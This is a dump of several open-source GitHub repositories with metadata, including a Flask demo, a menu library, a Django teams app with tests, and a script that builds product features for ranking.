595142d782610a9d0ab90e3f6e1db8b147388b9e
89025ad6e7390070bb299541f36c5873b4aeedcc
refs/heads/master
2021-01-26T09:16:04.450380
2020-02-27T01:59:54
2020-02-27T01:59:54
243,400,534
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6158536672592163, "alphanum_fraction": 0.6158536672592163, "avg_line_length": 22.571428298950195, "blob_id": "f720187696e3d1fa955082a4d5b4c327244f9879", "content_id": "1c925cfc25944f708515bfcf374a0ebdd8635c20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 164, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/app.py", "repo_name": "roydulal/Flask_Heruku_Pipline", "src_encoding": "UTF-8", "text": "from flask import Flask\napp =Flask(__name__)\[email protected](\"/\")\ndef index():\n return \"My fast Flask setup\"\nif __name__ == \"__main__\":\n app.run(use_reloader=True)" } ]
1
Shivansh001/Pocket_Dictionary-using-Python
https://github.com/Shivansh001/Pocket_Dictionary-using-Python
a84177aceea570386d2ed65c253345e44a8af464
69912c9283c34b87db6904fda423efb04aecfc6a
6a6fe232f257d529e5e462ea3581496f92aca077
refs/heads/main
2023-02-03T03:46:34.471679
2020-12-27T18:54:21
2020-12-27T18:54:21
324,828,002
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8074073791503906, "alphanum_fraction": 0.8074073791503906, "avg_line_length": 66.5, "blob_id": "69e64d994987c54d4e886dbdf4ccf3232977eacf", "content_id": "10ad4e634753d3eba7dfd7efbef694e3a11adc63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 135, "license_type": "no_license", "max_line_length": 101, "num_lines": 2, "path": "/README.md", "repo_name": "Shivansh001/Pocket_Dictionary-using-Python", "src_encoding": "UTF-8", "text": "# Pocket_Dictionary-using-Python\nIt's an amazing tool to find the meaning of any word directly with the help of this pocket dictionary\n" }, { "alpha_fraction": 0.7601810097694397, "alphanum_fraction": 0.7601810097694397, "avg_line_length": 22.55555534362793, "blob_id": "8b294d5e668f33c753a4b4852dade84dfc301116", "content_id": "f7068deb8e7f5eccaf587922f68aa3b8da9f335d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/pocketdict.py", "repo_name": "Shivansh001/Pocket_Dictionary-using-Python", "src_encoding": "UTF-8", "text": "#to make a pocket dictonary in python we can use\r\n#pyDictionary\r\n#pip install Dictionary\r\n\r\nfrom PyDictionary import PyDictionary\r\n\r\ndictionary = PyDictionary()\r\n\r\nprint(dictionary.meaning(input(\"Enter the keyword: \")))\r\n" } ]
2
Barbiero/PythonMenu
https://github.com/Barbiero/PythonMenu
809a50c9163b127eab5647749f31a68b0ed30329
ecfa7acc4440ab426edd1381940ed4f3a72b211d
7aec6d7af587663ee7356fb6518778c889a09fd2
refs/heads/master
2016-09-07T20:34:40.137231
2014-02-27T01:41:12
2014-02-27T01:41:12
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7755101919174194, "alphanum_fraction": 0.7755101919174194, "avg_line_length": 35.75, "blob_id": "128285beeec03c028563f82a68feca8d23927fba", "content_id": "b4b18ae0cb32514b4985a4fb1dfd1d99f962142a", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 147, "license_type": "permissive", "max_line_length": 123, "num_lines": 4, "path": "/README.md", "repo_name": "Barbiero/PythonMenu", "src_encoding": "UTF-8", "text": "PythonMenu\n==========\n\nLibrary to create simple Python menus that execute certain functions. Drastically reduces written code on the main program.\n" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.5353335738182068, "avg_line_length": 28.799999237060547, "blob_id": "56c3bb6bf68dd2beacf107f760d9130a6da101ea", "content_id": "d13202209cf85facaa8c740686a4185ad0c27808", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2533, "license_type": "permissive", "max_line_length": 116, "num_lines": 85, "path": "/menu.py", "repo_name": "Barbiero/PythonMenu", "src_encoding": "UTF-8", "text": "'''\nSimple menu system for python\nusage:\n\nm = Menu([menu title])\nm.addMenuOption(<option description>, [Function, [{arguments}]])\n(add more options as you wish)\nm.run()\n\nEach option can be associated to a Function.\nIn case the Function isn't callable, chosing that option will close the Menu. and proceed with anything past m.run()\n\n\n'''\n\nclass Menu:\n __name = ''\n maxlen = 0\n __options = []\n\n def __init__(self, name='OPTIONS MENU'):\n self.__name = name\n self.maxlen = len(self.__name)+2\n self.addMenuOption(\"Leave\")\n\n def getMenuSize(self):\n return len(self.__options)\n\n def getOptionLen(self, index):\n if(self.getMenuSize() > 9):\n return len(self.__options[index][0])+6\n\n return len(self.__options[index][0])+5\n \n def addMenuOption(self, descr, func=None, args={}):\n if(not isinstance(descr, str)):\n raise ValueError('Menu description must be a string.')\n\n\n T = (descr, (func, args))\n \n self.__options.append(T)\n index = self.__options.index(T)\n \n if(self.maxlen < self.getOptionLen(index)):\n self.maxlen = self.getOptionLen(index)\n\n def remMenuOption(self, index):\n if(not isinstance(index, int)):\n raise ValueError('Index must be an integer')\n\n if(self.getMenuSize() < index):\n raise IndexError('Index out of range')\n\n if(self.maxlen == self.getOptionLen(index)):\n self.maxlen = len(self.__name)+2\n for i in range(len(self.__options)):\n if i != index and self.maxlen < self.getOptionLen(i):\n self.maxlen = self.getOptionLen(i)\n\n self.__options.pop(index)\n\n def __str__(self):\n width = self.maxlen+2\n STR = '{:*^{w}}\\n*{: ^{self.maxlen}}*\\n{:*^{w}}\\n'.format('',self.__name,'',self=self, w=width)\n for i in range(self.getMenuSize()):\n opt_str = '*{: <{self.maxlen}}*\\n'.format('%d - %s' % (i, self.__options[i][0]), self=self)\n STR = STR + opt_str\n\n return STR + '{:*^{w}}'.format('', w=width)\n\n\n def run(self, optmsg='Choose an option: '):\n while True:\n print(self)\n opt = input(optmsg)\n opt = int(opt)\n if opt in range(0,self.getMenuSize()):\n f = self.__options[opt][1][0]\n if(not callable(f)):\n break\n arg = self.__options[opt][1][1]\n f(*arg)\n else:\n break\n" } ]
2
hughed2/django_teams
https://github.com/hughed2/django_teams
df60e8b1f21a16825b0b1a54e74a6a153dfd549a
011a16feed52bbe78cc1e5586d1cccf937689a26
99c1cea26abbd9c3747a501283a5a25d843ee5be
refs/heads/master
2020-12-26T02:38:59.905401
2015-04-29T05:53:30
2015-04-29T05:53:30
34,774,300
0
0
null
2015-04-29T05:32:24
2014-12-23T16:03:42
2014-12-23T16:03:42
null
[ { "alpha_fraction": 0.5974366664886475, "alphanum_fraction": 0.6012234091758728, "avg_line_length": 41.912498474121094, "blob_id": "c54f944ea6747342a0b03148c4bc3c7e51741432", "content_id": "9e21b7ecb5a8f3b379b6f6cf1313d8233bbbd5f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3433, "license_type": "no_license", "max_line_length": 128, "num_lines": 80, "path": "/django_teams/forms.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from django.forms import ModelForm, widgets\nfrom django import forms\nfrom django.utils.html import format_html\nfrom itertools import chain\nfrom django_teams.models import Team\nfrom django.utils.safestring import mark_safe\nfrom django.utils.encoding import force_text\n\nclass TeamCreateForm(ModelForm):\n class Meta:\n model = Team\n\nclass TeamEditForm(ModelForm):\n \"\"\"This form is very complicated;\n it consists of a hash containing :\n An array of pending requests\n An array of team leaders\n An array of team members\n The form should allow the team leaders to perform the following\n actions on any number of elements from each array, at the same time:\n Pending requests;\n approve\n deny\n Team Leaders\n Demote\n Remove\n Team Members\n Promote\n Remove\n \"\"\"\n\n class Meta:\n model = Team\n \nclass LinkedCheckboxSelectMultiple (widgets.CheckboxSelectMultiple):\n def render(self, name, value, attrs=None, choices=()):\n if value is None: value = []\n has_id = attrs and 'id' in attrs\n final_attrs = self.build_attrs(attrs, name=name)\n output = ['<ul>']\n # Normalize to strings\n str_values = set([force_text(v) for v in value])\n for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):\n # If an ID attribute was given, add a numeric index as a suffix,\n # so that the checkboxes don't all have the same ID attribute.\n if has_id:\n final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))\n label_for = format_html(' for=\"{0}\"', final_attrs['id'])\n else:\n label_for = ''\n\n cb = widgets.CheckboxInput(final_attrs, check_test=lambda value: value in str_values)\n option_value = force_text(option_value)\n rendered_cb = cb.render(name, option_value)\n text = option_label.split('/',3)\n if len(text) == 4 : # If we got a proper split\n obj_model = text[0]\n obj_id = text[1]\n option_label = force_text(text[3] + \" by \" + text[2]) # Project Name by Student\n output.append(format_html('<li><label{0}>{1} <a href=\"/' + obj_model + 's/' + obj_id + '/\">{2}</a></label></li>',\n label_for, rendered_cb, option_label))\n else: # Default to normal behavior without proper split\n option_label = force_text(option_label)\n output.append(format_html('<li><label{0}>{1} {2}</label></li>',\n label_for, rendered_cb, option_label))\n output.append('</ul>')\n return mark_safe('\\n'.join(output))\n\ndef action_formset(qset, actions, link=False):\n \"\"\"A form factory which returns a form which allows the user to pick a specific action to\n perform on a chosen subset of items from a queryset.\n \"\"\"\n class _ActionForm(forms.Form):\n if(link):\n items = forms.ModelMultipleChoiceField(queryset = qset, required=False, widget=LinkedCheckboxSelectMultiple)\n else: \n items = forms.ModelMultipleChoiceField(queryset = qset, required=False, widget=widgets.CheckboxSelectMultiple)\n action = forms.ChoiceField(choices = zip(actions, actions), required=False)\n\n return _ActionForm\n" }, { "alpha_fraction": 0.7055837512016296, "alphanum_fraction": 0.7055837512016296, "avg_line_length": 24.69565200805664, "blob_id": "8d7395e0aaf76e9d28d03986a7e8a1fa1eb0d90d", "content_id": "d250d633916c505aa9d25ed63802436ad67fa273", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 53, "num_lines": 23, "path": "/django_teams/tests/test_decorators.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from time import sleep\nimport sys\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.test.client import RequestFactory\n\nfrom django_teams.decorators import teamify\n\nclass DecoratorTests(TestCase):\n fixtures = ['test_data.json']\n\n def setUp(self):\n self.factory = RequestFactory()\n\n def test_can_import_without_errors(self):\n # If we can get this far, we passed this test\n pass\n\n def test_view(self):\n def view(request):\n pass\n teamify(view)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 39.13793182373047, "blob_id": "746fdd7bd3b51e8a00fe485ef44c92a39d1be853", "content_id": "5a7edf3f3c6e6b69fb575a4ce932eda87a79083e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1164, "license_type": "no_license", "max_line_length": 118, "num_lines": 29, "path": "/django_teams/urls.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom django_teams.views import *\n\nurlpatterns = patterns('',\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^admin/', include(admin.site.urls)),\n\n # TemplateView + Login\n #url(r'^$', login_required(TemplateView.as_view(template_name=\"home.html\")), {}, 'home'),\n url(r'^teams/$', TeamListView.as_view(), name='team-list'),\n url(r'^teams/create$', login_required(TeamCreateView.as_view()), name='team-create'),\n url(r'^teams/(?P<team_pk>\\d+)/invite$', login_required(TeamStatusCreateView.as_view()), name='teamstatus-create'),\n url(r'^teams/(?P<pk>\\d+)/$', TeamDetailView.as_view(), name='team-detail'),\n url(r'^teams/(?P<pk>\\d+)/edit$', TeamEditView.as_view(), name='team-edit'),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n )\n" }, { "alpha_fraction": 0.647219181060791, "alphanum_fraction": 0.6594874858856201, "avg_line_length": 32.65137481689453, "blob_id": "0f31bbaca3be6b4b89ae20c52cd18d0716515190", "content_id": "b567b7a0e78dbcace829640a66be1cb578157fa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3668, "license_type": "no_license", "max_line_length": 98, "num_lines": 109, "path": "/django_teams/tests/test_override.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from time import sleep\nimport sys\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom django_teams.models import override_manager, revert_manager, Team, TeamStatus, Ownership\nfrom django.contrib.sites.models import Site\n\nclass OwnershipTests(TestCase):\n fixtures = ['test_data.json']\n\n def tearDown(self):\n revert_manager(Site)\n\n def test_overriding_queryset_no_errors(self):\n import django_teams.models\n django_teams.models.CurrentUser = None\n django_teams.models.CurrentTeam = None\n override_manager(User)\n User.objects.all()\n\n # If there are no errors, we should be good.. Revert\n revert_manager(User)\n\n def test_can_override_sites(self):\n \"\"\"\n Attempts to override the sites framework so that we can only query sites we own\n - This is only a proof-of-concept test, as I don't want to include another app for testing\n \"\"\"\n # Set the current User\n import django_teams.models\n django_teams.models.CurrentUser = User.objects.get(pk=1)\n\n self.assertEqual(Site.objects.all().count(), 3)\n override_manager(Site)\n\n self.assertEqual(Site.objects.all().count(), 0)\n\n def test_can_gain_access(self):\n import django_teams.models\n django_teams.models.CurrentUser = User.objects.get(pk=1)\n\n self.assertEqual(Site.objects.all().count(), 3)\n site = Site.objects.get(pk=1)\n override_manager(Site)\n\n # Try granting the user access to one site\n team = Team(name=\"Team awesome\")\n team.save()\n\n team.add_user(django_teams.models.CurrentUser, team_role=20)\n\n Ownership.grant_ownership(team, site)\n\n self.assertEqual(Site.objects.all().count(), 1)\n\n def test_default_team_hides_objects(self):\n import django_teams.models\n django_teams.models.CurrentUser = User.objects.get(pk=1)\n\n Team.objects.all().delete()\n Ownership.objects.all().delete()\n TeamStatus.objects.all().delete()\n\n team1 = Team(name=\"Team Mtn Dew\")\n team1.save()\n team1.add_user(django_teams.models.CurrentUser, team_role=20)\n team2 = Team(name=\"Team ROFLCAT\")\n team2.save()\n team2.add_user(django_teams.models.CurrentUser, team_role=20)\n\n site1 = Site.objects.get(pk=2)\n Ownership.grant_ownership(team1, site1)\n site2 = Site.objects.get(pk=3)\n Ownership.grant_ownership(team2, site2)\n\n django_teams.models.CurrentTeam = team2\n\n override_manager(Site)\n\n site_test = Site.objects.get(pk=3)\n self.assertEqual(site_test, site2)\n\n self.assertEqual(Site.objects.all().count(), 1)\n self.assertEqual(Site.objects.all()[0].id, 3)\n self.assertEqual(Site.objects.all()[0], site2)\n\n django_teams.models.CurrentUser = None\n django_teams.models.CurrentTeam = None\n\n def test_removing_non_restricted_doesnt_crash_things(self):\n revert_manager(Team)\n\n def test_restricted_related_managers(self):\n # If we override the user, we should have no access to any groups\n import django_teams.models\n django_teams.models.CurrentUser = User.objects.get(pk=1)\n\n team1 = Team(name=\"Team Mtn Dew\")\n team1.save()\n team1.add_user(django_teams.models.CurrentUser, team_role=20)\n\n Ownership.grant_ownership(team1, django_teams.models.CurrentUser)\n\n override_manager(User)\n\n self.assertEqual(User.objects.all().count(), 1)\n self.assertEqual(django_teams.models.CurrentUser.groups.all().count(), 0)\n" }, { "alpha_fraction": 0.6370245814323425, "alphanum_fraction": 0.6370245814323425, "avg_line_length": 38.733333587646484, "blob_id": "0219438de426974c5931f05eb55ffdb2b58b7e7f", "content_id": "1d88880f3306ec2c2bd7fbbf4e241e206cec0c58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1788, "license_type": "no_license", "max_line_length": 101, "num_lines": 45, "path": "/django_teams/decorators.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from functools import wraps\nfrom django_teams.models import override_manager, revert_manager\nimport django_teams.models\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.decorators import available_attrs\nfrom django.db import models\nfrom django_teams.utils import get_related_managers\n\nimport sys\nimport inspect\n\ndef teamify(view_func):\n @wraps(view_func, assigned=available_attrs(view_func))\n def wrapper(request, *args, **kwargs):\n # Set the current user\n django_teams.models.CurrentUser = request.user\n # Set the current team, as per settings instructions\n def get_team(user, **kwargs):\n if 'django_team_pk' in kwargs:\n return Team.objects.get(pk=kwargs['django_team_pk'])\n return None\n\n django_teams.models.CurrentTeam = get_team(django_teams.models.CurrentUser, **kwargs)\n\n # Setup the filters\n # Ignore apps/models specified in settings\n ignore_apps = ['django_teams', 'contenttypes']\n ignore_models = []\n for model in models.get_models(include_auto_created=True):\n m = ContentType.objects.get_for_model(model)\n if m.app_label not in ignore_apps and (m.app_label + '_' + m.model) not in ignore_models:\n override_manager(model)\n # Override related managers\n for manager in get_related_managers(model):\n sys.stdout.write(repr(manager)+\"\\n\")\n sys.stdout.flush()\n override_manager(manager)\n\n try:\n ret = view_func(request, *args, **kwargs)\n finally:\n for model in models.get_models(include_auto_created=True):\n revert_manager(model)\n return ret\n return wrapper\n" } ]
5
alanzoppa/pyfacebook
https://github.com/alanzoppa/pyfacebook
44a23a16d830bafacda3d3b32e38568bfa362d44
87a8fcc659a07fec10c16fa80fb460d722212f95
d767de7e981f7ede8b290857205fbc2576e4a663
refs/heads/master
2021-01-16T20:43:55.981968
2010-09-08T17:00:51
2010-09-08T17:00:51
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6495956778526306, "alphanum_fraction": 0.6549865007400513, "avg_line_length": 29.91666603088379, "blob_id": "16efae70d5cbf8ed36d64cd10a4df94079305d56", "content_id": "c4bc44af8ec904b489880a9555f250486721627a", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 371, "license_type": "no_license", "max_line_length": 63, "num_lines": 12, "path": "/setup.py", "repo_name": "alanzoppa/pyfacebook", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom distutils.core import setup\n\nsetup(name='pyfacebook',\n version='0.1',\n description='Python Client Library for the Facebook API',\n author='Samuel Cormier-Iijima',\n author_email='[email protected]',\n url='http://github.com/alanzoppa/pyfacebook',\n packages=['pyfacebook', 'pyfacebook.djangofb',\n 'pyfacebook.djangofb.default_app'])\n" } ]
1
magicbupt/ltr_feartures_compute_job
https://github.com/magicbupt/ltr_feartures_compute_job
ba8e300d5b435958f2e4fd8d8c8e147693e683d3
aa6e5b504248cf1ba95ce7fd770a370fe618ca7d
284205b7cc98f8368fd44957e0cfa9ad988643ad
refs/heads/master
2019-01-22T00:07:44.576068
2013-11-19T03:44:09
2013-11-19T03:45:47
14,513,331
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6293714046478271, "alphanum_fraction": 0.6432049870491028, "avg_line_length": 26.542682647705078, "blob_id": "8a8e66ed0e6cb503817860b5c62c7b9c44791308", "content_id": "d87bdeb465c81164e26e4af709c66f774e88ec17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9036, "license_type": "no_license", "max_line_length": 110, "num_lines": 328, "path": "/bin/get_product_info.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf-8\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport os\nimport re\nimport time, datetime\nimport math\nfrom ConfigParser import RawConfigParser\nfrom ConfigParser import *\n\nsys.path.append('../lib')\nimport logging\nimport logging.config\nfrom mail_sender import MailSender\nfrom data_access_object import DataObject\nfrom db_factory import DBFactory\n\n\nclass ProductInfo(object):\n\tdef __init__(self, conf_path = '..'):\n\t\t'''\n\t\tinit\n\t\t'''\n\t\t#db redis config file position\n\t\tself.conncfg = '%s/conf/connect.cfg' % (conf_path)\n\t\t#log config file\n\t\tself.logcfg = '%s/conf/logger.conf' % (conf_path)\n\t\tlogging.config.fileConfig(self.logcfg)\n\t\tself.logger = logging.getLogger('log')\n\t\t#other config such as email recivers\n\t\tself.filecfg = '%s/conf/main.cfg' % (conf_path)\n\t\tself.fileconfig = RawConfigParser()\n\t\tself.fileconfig.read(self.filecfg)\n\t\t#sql config file\n\t\tself.sqlcfg = '%s/conf/sql.cfg' % (conf_path)\n\t\tself.config = RawConfigParser()\n\t\tself.config.read(self.conncfg)\n\t\tself.sqlfig = RawConfigParser()\n\t\tself.sqlfig.read(self.sqlcfg)\n\t\t#connect db redis\n\t\tself.conn_search_db = self.connDbserver('search_v3_view')\n#\t\tself.conn_redis = self.connRedis()\n\t\tself.sql = self.sqlfig.get('select', 'select_product_info')\n\t\t# config email info\n\t\tself.mail_recivers = self.setMailReceiver('email', 'receiver')\n\t\tself.mail_sender = MailSender()\n\t\t#product info\n\t\tself.pid_info = {}\n\t\tself.pid_day_uv = {}\n\t\tself.pid_week_uv = {}\n\t\tself.pid_month_uv = {}\n\n\n\tdef readUV(self, filepath, dt):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(filepath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tarray = line.strip().split()\n\t\t\t\tif len(array) != 2:\n\t\t\t\t\tcontinue\n\t\t\t\tpid = str2int(array[0])\n\t\t\t\tuv = str2int(array[1])\n\t\t\t\tdt[pid] = uv\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\n\tdef getUV(self, pid, dt):\n\t\tif pid in dt:\n\t\t\treturn dt[pid]\n\t\treturn 0\n\t\t\n\tdef setMailReceiver(self,section = 'email', part = 'receiver'):\n\t\temail_list = self.fileconfig.get(section,part).split(',')\n\t\tmail_receiver = []\n\t\tlenght = len(email_list)\n\t\tfor i in range(lenght):\n\t\t\temail = email_list[i].strip(' ')\n\t\t\tif email == '':\n\t\t\t\tcontinue\n\t\t\tmail_receiver.append(email)\n\t\treturn mail_receiver\n\n\tdef connDbserver(self, section = 'antifraud_conn'):\n\t\tdbserver = None\n\t\ttry:\n\t\t\tdbtype = self.config.get(section, 'dbtype')\n\t\t\thost = self.config.get(section, 'host')\n\t\t\tport = self.config.get(section, 'port')\n\t\t\tuser = self.config.get(section, 'user')\n\t\t\tpassword = self.config.get(section, 'password')\n\t\t\tdatabase = self.config.get(section, 'database')\n\t\t\tdbserver = DBFactory.Connect(dbtype = dbtype, host = host, database = database, \\\n\t\t\t\t\tcharset = 'utf8',user = user, password = password, port = port)\n\t\texcept Exception, ex:\n\t\t\tself.logger.error(ex)\n\t\t\tprint 'Can not connect to dbserver'\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\t\traise Exception, ex\n\t\treturn dbserver\n\n\tdef getProductInfo(self, filepath):\n\t\tsql = self.sql\n\t\tfile = None\n\t\ttry:\n\t\t\tself.conn_search_db.execute(sql)\n\t\t\tfile = open(filepath, 'w+')\n\t\t\twhile True:\n\t\t\t\tline = self.conn_search_db.fetchmany(10000)\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tfor i in range(len(line)):\n\t\t\t\t\tarray = line[i]\n\t\t\t\t\tif len(array) != 16:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tpid, is_new, is_mall, is_discount, score, discount, \\\n\t\t\t\t\t\tsale_day, n_sale, sale_month, n_keep, \\\n\t\t\t\t\t\treview_total, price, dd_price, \\\n\t\t\t\t\t\tpromo_price, n_days = self.caculateModel(array)\n\t\t\t\t\td_uv = self.getUV(pid, self.pid_day_uv)\n\t\t\t\t\tw_uv = self.getUV(pid, self.pid_week_uv)\n\t\t\t\t\tm_uv = self.getUV(pid, self.pid_month_uv)\n\t\t\t\t\tproduct_info = \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (is_mall, is_new, \\\n\t\t\t\t\t\tis_discount, score, discount, sale_day, n_sale, sale_month, n_keep, review_total, price, dd_price,\\\n\t\t\t\t\t\tpromo_price, d_uv, w_uv, m_uv, n_days)\n\t\t\t\t\tfile.write(\"%s\\t%s\\n\" % (pid, product_info))\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\t\tself.logger.error(ex)\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\t\t\tif self.conn_search_db:\n\t\t\t\tself.conn_search_db.close()\n\t\n\t\n\tdef readProductInfo(self, srcpath, n_features):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(srcpath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tarray = line.strip(\"\\n\").split(\"\\t\")\n\t\t\t\tlenght = len(array)\n\t\t\t\tif lenght != n_features:\n\t\t\t\t\tcontinue\n\t\t\t\tpid = str2int(array[0])\n\t\t\t\tproduct_info = \"\"\n\t\t\t\tfor i in range(1, lenght):\n\t\t\t\t\tproduct_info = \"%s\\t%s\" % (product_info, array[i])\n\t\t\t\tproduct_info = product_info.strip(\"\\t\")\n\t\t\t\tself.pid_info[pid] = product_info\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\t\t\n\t\n\tdef IsNewProduct(self, pid, first_input_date, cat_paths):\n\t\tif first_input_date==None or str(first_input_date)=='':\n\t\t\treturn 0, 0\n\t\tif cat_paths == None:\n\t\t\tcat_paths = \"01\"\n\t\t\n\t\tmall_new_days = 14\n\t\tpub_new_days = 30\n\t\tmall_time = ( datetime.datetime.now() + \\\n\t\t\t\tdatetime.timedelta(days=-mall_new_days) ).strftime('%Y-%m-%d')\n\t\tpub_time = ( datetime.datetime.now() + \\\n\t\t\t\tdatetime.timedelta(days=-pub_new_days) ).strftime('%Y-%m-%d')\n\n\t\tmall_new = int(time.mktime(time.strptime(mall_time, '%Y-%m-%d')))\n\t\tpub_new = int(time.mktime(time.strptime(pub_time, '%Y-%m-%d')))\n\t\tfirst_date = int(time.mktime(\\\n\t\t\t\ttime.strptime(first_input_date.strftime('%Y-%m-%d'), '%Y-%m-%d')))\n\n\t\tcat = cat_paths.strip().split('|')[0].split('.')[0]\n\t\t\n\t\tis_mall_product = 0\n\t\tif cat == \"58\":\n\t\t\tis_mall_product = 1\n\t\t\n\t\tif cat==\"58\" and (first_date-mall_new)>0:\n\t\t\treturn 1, is_mall_product\n\t\telif cat==\"01\" and (first_date-pub_new)>0:\n\t\t\treturn 1, is_mall_product\n\t\telse:\n\t\t\treturn 0, is_mall_product\n\t\treturn 0, is_mall_product\n\n\tdef IsDiscountProduct(self, begin_date, end_date):\n\t\tif begin_date != None:\n\t\t\tnow_date = datetime.datetime.now()\n\t\t\tif now_date >= begin_date:\n\t\t\t\tif end_date != None:\n\t\t\t\t\tif now_date <= end_date:\n\t\t\t\t\t\treturn 1\n\t\t\t\telse:\n\t\t\t\t\treturn 1\n\t\treturn 0\n\n \tdef calDiscount(self, price, dd_price, promo_price, isDiscount):\n\t\tdiscount = 0\n\t\tprice = str2float(price)\n\t\tdd_price = str2float(dd_price)\n\t\tpromo_price = str2float(promo_price)\n\n\t\tif price == 0:\n\t\t\tdiscount = 10\n\t\telse:\n\t\t\tif isDiscount == 1 and promo_price != 0:\n\t\t\t\tdiscount = promo_price/(1.0*price)*10\n\t\t\telif dd_price != 0:\n\t\t\t\tdiscount = dd_price/(1.0*price)*10\n\t\t\telse:\n\t\t\t\tdiscount = 0\n\n\t\treturn round(discount, 2), price, dd_price, promo_price\n\n\tdef productScore(self, score, total_review_count):\n\t\tif score == None:\n\t\t\tscore = 0\n\t\tif total_review_count == None:\n\t\t\ttotal_review_count = 0\n\t\tm = 100\n\t\taverage_score = 5.0\n\t\tval = (total_review_count*score + m*average_score)/(1.0*(total_review_count + m))\n\t\treturn val\n\n\tdef calSaledDays(self, input_day):\n\t\tif input_day == None:\n\t\t\treturn 1000\n\t\tnowday = datetime.datetime.now()\n\t\tdelta = nowday - input_day\n\t\treturn delta.days\t\n\n\tdef caculateModel(self, array):\n\t\tpid = str2int(array[0]) # get pid\t\t\n\t\tis_new, is_mall = self.IsNewProduct(pid, array[7], array[8]) #is new\n\t\tis_discount = self.IsDiscountProduct(array[5], array[6]) #is discount\n\t\tdiscount, price, dd_price, promo_price = self.calDiscount(array[10], \\\n\t\t\t\t\tarray[11], array[12], is_discount) # discount\n\t\tn_keep = str2int(array[4]) #keep num\n\t\tn_sale = str2int(array[1]) #sale num\n\t\tscore = str2float(array[3]) # product score\n\t\treview_total = str2int(array[2]);\n\t\tsale_day = str2int(array[13]);\n\t\tsale_month = str2int(array[14]);\n\t\tn_days = self.calSaledDays(array[15])\n\t\t\n\t\treturn pid, is_new, is_mall, is_discount, score, discount, sale_day,\\\n\t\t\t\t n_sale, sale_month, n_keep, review_total, price, dd_price, promo_price, n_days;\n\n\tdef run(self, search_log_file = \"../data/product_info_\", n_features = 18):\n\t\ttry:\n\t\t\tcurday = datetime.datetime.now().strftime('%Y-%m-%d')\n\t\t\tcurday = getSpecifiedDay(curday, 1)\n\t\t\t\n\t\t\tsearch_log_file = \"%s%s\" % (search_log_file, curday.replace(\"-\", \"\"))\n\t\t\tif not os.path.exists(search_log_file):\n\t\t\t\tself.readUV(\"../data/temp_data/uv_d_%s\" % curday, 